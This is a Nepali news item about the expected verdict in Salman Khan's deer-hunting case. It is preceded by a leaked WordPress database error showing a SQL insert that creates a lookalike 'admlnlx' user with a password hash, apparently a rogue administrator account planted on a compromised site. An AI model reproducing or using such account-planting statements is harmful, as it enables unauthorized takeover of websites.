WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpi1PdJNJUB.cKbBXgQJOdL6ktsQNe0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:59:45', '', 'admlnlx', 'admlnlx')
माघ, ६ –
एजेन्सी । बलिउड सुपर स्टार सलमान खानको हरिण शिकारसँग जोडिएको १८ वर्ष पुरानो मुद्दाको बुधबार फैसला हुने बताइएको छ । यदि यो मुद्दामा सलमान दोषी ठहरिए ७ वर्षसम्म जेल सजाय हुन सक्ने बताइएको छ । सन १९९८ मा भएको यो शिकार सम्बन्धि मुद्दामा सलमानको विरुद्ध चार मुद्दा चलिरहेको छ । यी मध्ये दुईमा लेहाइकोर्टबाट सफाई पाइसकेका छन । अर्को एक मुद्दाको सुनुवाई भने जनवरी २५ तारीखमा तोकिएको छ ।
बिना लाइसेन्स हतियार राखेको आरोप सावित भएमा सलमान खानलाई ३ वर्ष जेल सजाय हुने बताइएको छ । र हतियारको गलत प्रयोग भएको प्रमाणित भएमा ७ वर्ष जेल सजाय हुनेछ । यदि सलमानलाई ३ वर्ष भन्दा बढी सजाय सुनाइएमा अदालतबाट सिधै जेल जानु पर्ने हुन्छ । नियम अनुसार मुद्दाको फैसला आरोपीको उपस्थितिमा हुने भएकोले सलमान अहिले अदालतमा उपस्थित भएका छन । उनीसँग बहिनी अलबीरा पनि साथमै रहेकी छन ।